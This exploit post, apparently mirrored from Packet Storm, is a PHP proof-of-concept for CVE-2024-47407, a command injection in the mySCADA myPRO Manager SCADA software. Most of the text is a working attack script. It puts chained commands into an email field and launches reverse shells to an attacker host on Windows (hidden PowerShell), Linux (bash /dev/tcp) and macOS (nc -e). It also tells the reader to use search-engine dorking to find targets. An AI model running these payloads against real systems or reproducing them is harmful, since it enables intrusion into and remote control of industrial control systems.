Share
## https://sploitus.com/exploit?id=PACKETSTORM:214964
=============================================================================================================================================
| # Title : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.myscada.org/mypro/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description:
PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.
Send an HTTP POST request to /get with the email data containing the command to be executed.
Check if the response is 200, meaning the command was executed successfully.
Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT
(Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407 ) .
[+] save code as poc.php .
[+] Set Target : line 4 + 5 + 6
[+] USage : php poc.php
[+] PayLoad :
<?php
// by indoushka
// استغلال CVE-2024-47407 في mySCADA myPRO Manager للحصول على Shell Reverse على أنظمة تشغيل مختلفة
$target = "http://target-ip:34022/get"; // استبدل بـ IP الضحية
$attacker_ip = "ATTACKER_IP"; // استبدل بـ IP المهاجم
$attacker_port = "ATTACKER_PORT"; // استبدل بالمنفذ الذي ستستمع عليه
// كشف نظام التشغيل وتنفيذ الحمولة المناسبة
$windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";
$linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";
$mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";
// تجهيز البريد الإلكتروني لاستغلال حقن الأوامر
$email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";
$email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
$email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
$email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
$email_injection .= " #";
// إعداد بيانات الطلب
$data = json_encode([
"command" => "testEmail",
"email" => $email_injection
]);
// إرسال الطلب
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// التحقق من نجاح الاستغلال
if ($http_code == 200) {
echo "[+] تم إرسال حمولة Shell Reverse بنجاح! انتظر الاتصال على المنفذ $attacker_port\n";
} else {
echo "[-] فشل التنفيذ، ربما النظام محمي.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================